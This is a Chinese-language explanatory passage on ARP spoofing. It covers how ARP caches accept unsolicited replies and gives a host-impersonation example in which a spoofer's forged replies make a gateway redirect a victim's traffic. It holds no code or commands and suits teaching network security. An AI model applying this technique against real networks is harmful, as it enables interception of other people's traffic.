在以太局域⽹内数据包传输依靠的是MAC地址，IP地址与MAC对应的关系依靠ARP表，每台安装有TCP/IP协议的主机(包括⽹关)都有⼀个ARP缓存表。

该表中保存这⽹络中各个电脑的IP地址和MAC地址的对照关系。

在正常情况下arp缓存表能够有效的保证数据传输的⼀对⼀性。

但是ARP协议对应的ARP缓存表维护机制中存在不完善的地⽅，当主机收到⼀个ARP的应答包后，它并不验证⾃⼰是否发送过这个ARP请求，⽽是直接将应答包⾥的MAC地址与IP对应的关系替换掉原有的ARP缓存表⾥的相应信息。

这就是导致arp欺骗的根本原因。

简单总结⼀下，ARP欺骗⼤致可以分为以下三种：1、伪造主机欺骗源C把⾃⼰伪装成局域⽹内的另⼀台主机B，使得局域⽹内发往B的报⽂都流向了C。

伪造主机的过程与伪造⽹关类似。

图1：伪造主机图1中，我们假设局域⽹中有三台主机，分别是⽹关，欺骗源和被骗主机，他们的IP的MAC地址都标在图中了。

欺骗源每隔⼀定的时间间隔就向⽹关发送⼀个ARP报⽂，内容为我的IP地址是192.168.1.3（被骗主机IP），我的MAC地址是BB-BB-BB-BB-BB-BB（⾃⼰的MAC地址）。

这样当⽹关更新ARP缓存表的时候，就会把这个错误的IP和MAC映射关系登记在ARP缓存表中，下次当⽹关转发报⽂的时候就会把发送给被骗主机的报⽂发送给欺骗源。